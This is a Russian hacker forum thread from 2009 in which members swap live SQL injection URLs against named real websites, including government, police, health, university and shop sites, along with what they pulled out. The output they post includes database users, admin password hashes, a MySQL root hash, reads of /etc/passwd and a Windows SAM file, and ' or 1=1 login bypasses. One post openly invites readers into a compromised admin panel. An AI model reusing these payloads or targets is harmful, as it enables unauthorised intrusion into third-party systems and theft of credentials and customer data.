SQL Инъекции

$n@ke · 10 Nov 2009

=))

revip:
star-force.ru
star-force.com
Click to expand...

http://www.onlinesecurity-on.com/protect.phtml?c=55+union+select+1,2,3,database(),user(),6,7,8,9,10,11,12,version(),14,15,16,17+limit+1,1/*
Click to expand...

onlinesecurity@localhost
onlinesecurity
5.0.45
Click to expand...

DezMond™ · 10 Nov 2009

http://www.shaman-magazine.com/fhs/template_e-magazine.php?ID=-125+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+&bereich=1

http://ashleybakery.com/features.php?ID=-1+union+select+1,2,3,4+--+

http://gorabazarici.org/news.php?id=-14+union+select+1,2,concat_ws(0x3a3a,admin_id,admin_username,admin_password),4,5+from+admin_master+--+

http://photo-usa.ru/magazine.php?action=goodsdescription&target=-937+union+select+1,2,3,4,5,6,7,8,9,10+/*+

http://www.soulsista.nl/pages/magazine.php?onderwerp=diggindeep&id=-63+union+select+1,2,3,4,5,6,7,8,9+from+admin+/*+&lastlink=magazine

http://www.ilfaroonline.it/magazine.php?id=-487+union+select+1,2,pass,4,5,6+from+admin+--+

http://www.police.sec.ps/magazine.php?id=-1+union+select+1,password,user,4,5,6,7+from+_user+--+

http://zy.excite.co.jp/p/magazine.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+/*+

2pick · 10 Nov 2009

http://www.rustavi2.com/news/calendar_newsg.php?pg=&ddd=-2.9.2009%27%20UNION%20SELECT%201,2,3,user%28%29,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17%23&ddd2=2-9-2009&month=10&year=2009&wth=&ct=0&id_news=0

Походу дидосят... Ну вот докучи скуль

hackmen · 10 Nov 2009

ПР6
http://health.utah.gov/medicaid/pharmacy/priorauthorization/view.php?id=-1+union+select+1,2,3,4,5--

ver: 4.1.6-gamma-standard-log
base: pharmacy
user: [email protected]
os: pc-linux

[underwater] · 10 Nov 2009

Code:

http://group.ge/show.php?id_series=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Code:

http://www.dco.es/doxanews.php?id=-1+union+select+all+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6--

Code:

http://www.soundboards.com/comment.php?id=null%20union%20all%20select%201,2,3,concat(email,0x3a,password),5%20from%20users--

z00MAN · 11 Nov 2009

Code:

http://erem.ru/pages/products.html?id=-11+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,8,10,11,12,13--

eremeevskoe:4.0.16:eremeevskoe@localhost

ТИЦ80
ПР2

ololo shkolota

Code:

http://dag.com.ua/nikolaev/schools/index.php?show=article&new_id=1+union%20all+select+1,null,null,null,null,null,null,null+--+

ТИЦ130

ILYAtirtir · 11 Nov 2009

Федеральное Космическое Агенство.Научный Центр Оперативного Мониторинга Земли.

http://catalog.ntsomz.ru/data_new/dataset/ds_det.php?ds=RRR'+union+select+null,BANNER||user,null,null,null,null,null,null,null,null,null,null,null,null,null+from+v$version--
Click to expand...
Code:
CORE 9.2.0.1.0 Production||OMZ
http://thema.ntsomz.ru/modis/cgi/modis_proj.pl?id=2404&type=modis'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,database(),user(),version()),13--+
Click to expand...
Code:
granules_products:granules_reader@localhost:5.0.45-log

maestra_toys · 11 Nov 2009

ТИЦ 20 ПР 5

Code:

http://www.insanely-great.com/news.php?id=-10655+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 --

[email protected]:flamini_igm:4.1.21-log

ПР 5

Code:

http://www.grfoundation.org/news.php?id=-62+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10

grcf@localhost:grcf:5.0.51a

s0l_ir0n · 11 Nov 2009

Даже не знаю что это:
dekulk@localhost:dekulk:5.0.51a

http://www.dekulk.nl/doc.php?id=-1+union+select+1,2,3,ConCat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5+--
Click to expand...

Вывод скули через сохранение php файла
ws-univ@localhost:ws-univ:4.1.22

http://widener.webstudy.com/doc.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,ConCat_ws(0x3a,user(),database(),version()),14,15,16,17,18,19,20,21,22+--
Click to expand...

Университет Танзании:
aru_web@localhost:aru_web:5.0.22

http://www.aru.ac.tz/doc.php?id=-1+union+select+ConCat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11+--
Click to expand...

Сайт про остеохондроз:
h2ssd-m_root@localhost:h2ssd-m_spinet:5.0.45-log

http://spinet.ru/voting/stat.php?id=-1+union+select+1,ConCat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3--
Click to expand...

mailbrush · 11 Nov 2009

flamman.se

Code:

http://www.flamman.se/senaste.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user(),database(),version()))),4,5,6,7,8

Code:

[email protected]:u4517781_1:4.1.13-standard

basketme.com

Code:

http://www.basketme.com/2.0/opinion.php?id=-70+UnIoN+SeLeCt+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8

Code:

[email protected]:cm187240:5.0.60sp1-enterprise-gpl-log

diariodelasislas.es

Code:

http://www.diariodelasislas.es/opinion.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4

Code:

diario@localhost:diario:4.1.20

pelligrim · 11 Nov 2009

Code:
http://www.severyanka.ru/news.php?id=12+union+select+1,2,3,version()--
4.1.22:stsbs_nsk_severyanka:[email protected]
есть таблица clients
Code:
http://www.region-media.ru/city.php?id=99989+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7--
5.0.22:wwwregionpressar_wwwregionmediar:region01_wwwregi@localhost
Code:
http://bfvz.ru/thanks.php?id=999999+union+select+1,concat_ws(0x3a,version(),database(),user()),3--
5.0.45:bfvz_bfvz:bfvz@localhost

547 · 11 Nov 2009

сайтик как вы уже наверное догадались на финском)
Code:
http://www.ymparistokasvatus.fi/vihrealippu/osallistujat/show.php?id=-110+union+select+1,unhex(hex(concat_ws(0x3a,Id,username,password))),3,4,5,6,7,8,9,10,11,12+from+admins--
парольчик подходит, так што милости просим в админку)

погнали дальше!!!

http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,database(),version(),user(),@@version_compile_os),26,27,28,29,30--
zargon:4.1.12-standardc-linux-gnu-log:zargon@localhost

http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,user_name,user_password),26,27,28,29,30+from+4images_users--

http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,user,passwd),26,27,28,29,30+from+users--
диры
Code:
/
/download/
/search/
/cgi-bin/
/images/
/news/
/links/
/support/
/forum/
/services/
/partners/
/banner/
/mobile/
/weather/
/entertainment/
/doc/
/chat/
/tv/
/multimedia/
/pictures/
/test/
/navigation/
/portfolio/
/polls/
/comics/
/pop/
/ssh/
/guestbook/
/bilder/
/co/
/presentation/
/inc/
/regional/
/iso/
/fonts/
/cinema/
/IT/
/mil/
/lunch/
/vortex/
/htdig/
/http%3A%2F%2Fwww/
/newsimages/
/reklam/
/happenings/
/cgi-bin2/
/regionalnews/
/contact/
/ws/
/messenger/
/tourism/
/webshop/
/newusers/
/faq/
/css/
/cat/
/isp/
/price/
/webcam/
/booking/
/icons/
/pub/
/users/
/errors/


--------------------------------
--------------------------------

[x60]unu · 11 Nov 2009

history.uk.com -
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/version(),2/**/FROM/**/mysql.user/*
version - 5.0.20-log
user - root@localhost
database - history

mysql.user
user - root
password - C08D908F016260368DD6A842F1E03730F8FD0D20
фильтраця - p
file_priv - Y
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),user,password,'p',file_priv),2/**/FROM/**/mysql.user/*

etc/passwd

http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/load_file('/etc/passwd'),2/**/FROM/**/mysql.user/*

ILYAtirtir · 11 Nov 2009

Республика Алтай :: официальный интернет-портал
тИЦ: 600
PR: 6

http://www.altai-republic.com/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=20000+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5&page=1
Click to expand...
Code:
altaire8_ra:altaire8_ra@localhost:4.1.25-log
Работаем за спасибо!)

Xcontrol212 · 11 Nov 2009

Code:

http://www.cyclosprint.eu/shop.php?cid=93&hmID=-1+union+select+1,concat_ws(%27;%27,login,password),3,4,5,6,7,8,9+from+users_admin+limit+1,1/*

Code:

http://www.cap-press.com/cart.php?add=-1+union+select+1,version()--

5.0.67-log
5 версия
[email protected]
capsci_bookdb

Таблицы:

Code:

auth_scr
auth_scr_reply
authbook
authors
book_links
books
books_forwarding
books_link
books_tmp
booksubj
contacts
discounts
frontpage
minosubjects
misc
orders
page_contents
series
series_book
subjects
supps
tms
tracklog

Code:

http://www.euroinf.it/shop/shop.php?id=-1 union select 1,2,3,Column_Name,5,6,7,8 from INFORMATION_SCHEMA.Columns where Table_Name=0x636c69656e746932/*

Тут видны все таблы:

Code:

http://www.euroinf.it/shop/shop.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*

Bb0y · 11 Nov 2009

Говермент)

MySQL 5.0.45-community-nt
сервер на винде
http://odpa14.gov.ua/?_npp=-3746+union+select+1,concat_ws(0x3a,user,0x3a,password,0x3a,file_priv)+from+mysql.user

http://odpa14.gov.ua/?_npp=-3746+union+select+1,hex(load_file(0x633a2f77696e646f77732f7265706169722f73616d)) - чтение файлов на сервере. файл sam

onbka · 11 Nov 2009

http://housewives.org.ua/text.php?id=-689 union select 1,2,3,4,concat_ws(0x3a,version(),user(),databa se()) --
Click to expand...

4.1.25-log:[email protected]:freemp3_slovo

[aywo] · 11 Nov 2009

PR4

Code:

http://www.proconsim.ru/cat.php?m=-1+union+select+1,2,3,concat_ws(0x3a,user(),%20version(),%20database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

PR1

Code:

http://www.czech-tech.ru/index.php?dword=catalog&id=10+union+select+1,2,3,table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1,1 --

PR3

Code:

http://www.baurum.ru/_library/?cat=pipes-plastic&id=-9999+union+select+1,2,concat_ws(0x3a,%20version(),%20user(),%20database()),4,5,6,7,8,9,10,11,12/*

Mr.Br0wn · 12 Nov 2009

Code:
http://www.slavgorod.ru/admin/editnews.php?id=3775{SQL}
login: ' or 1=1/*
password: ' or 1=1/*
Code:
http://www.slavgorod.ru/admin/
ТИЦ: 230
PR: 3

ElteRUS · 12 Nov 2009

Секас-шоп, закупаемся ^^

http://www.extremerestraints.com/tell_a_friend.php?products_id=1248+union+select+*+from+(select+*+from+(select+name_const((select+concat_ws(0x2F,customers_email_address,customers_password)+from+customers+limit+0,1),14)d)+as+t+join+(select+name_const((select+concat_ws(0x2F,customers_email_address,customers_password)+from+customers+limit+0,1),14)e)b)a--+

SQL Инъекции

$n@ke Elder - Старейшина

DezMond™ Elder - Старейшина

2pick Elder - Старейшина

hackmen Banned

[underwater] Member

z00MAN Banned

ILYAtirtir Elder - Старейшина

maestra_toys Banned

s0l_ir0n Active Member

mailbrush Well-Known Member

pelligrim Elder - Старейшина

547 Active Member

[x60]unu Banned

ILYAtirtir Elder - Старейшина

Xcontrol212 Elder - Старейшина

Bb0y Active Member

onbka Member

[aywo] Elder - Старейшина

Mr.Br0wn Banned

ElteRUS Elder - Старейшина

Useful Searches

SQL Инъекции

$n@ke Elder - Старейшина

DezMond™ Elder - Старейшина

2pick Elder - Старейшина

hackmen Banned

[underwater] Member

z00MAN Banned

ILYAtirtir Elder - Старейшина

maestra_toys Banned

s0l_ir0n Active Member

mailbrush Well-Known Member

pelligrim Elder - Старейшина

547 Active Member

[x60]unu Banned

ILYAtirtir Elder - Старейшина

Xcontrol212 Elder - Старейшина

Bb0y Active Member

onbka Member

[aywo] Elder - Старейшина

Mr.Br0wn Banned

ElteRUS Elder - Старейшина